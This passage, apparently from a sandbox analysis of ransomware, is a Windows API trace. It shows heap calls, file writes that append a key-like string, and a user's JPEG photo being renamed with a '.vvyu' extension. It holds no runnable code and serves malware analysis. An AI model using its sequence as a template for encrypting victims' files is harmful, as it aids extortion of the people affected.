HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0193.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0193.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d422b0 | out: hHeap=0x6a0000) returned 1 [0193.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.989] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x26a5, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x26a5, lpOverlapped=0x0) returned 1 [0193.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.990] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x26aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.990] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.991] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.992] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.992] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.992] CloseHandle (hObject=0x584) returned 1 [0193.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47828 [0193.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d49778 [0193.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47828 | out: hHeap=0x6a0000) returned 1 [0193.994] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\xGPgXL.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\xgpgxl.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\xGPgXL.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\xgpgxl.jpg.vvyu")) returned 1 [0193.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.995] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0193.999] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50e7f7a0, ftCreationTime.dwHighDateTime=0x1d897f9, ftLastAccessTime.dwLowDateTime=0x517683c0, ftLastAccessTime.dwHighDateTime=0x1d89d22, ftLastWriteTime.dwLowDateTime=0x517683c0, ftLastWriteTime.dwHighDateTime=0x1d89d22, nFileSizeHigh=0x0, nFileSizeLow=0x26aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xGPgXL.jpg", cAlternateFileName="")) returned 0 [0194.000] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0194.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0194.001] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0194.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0194.001] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0194.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0194.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0194.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.031] HeapFree (in: 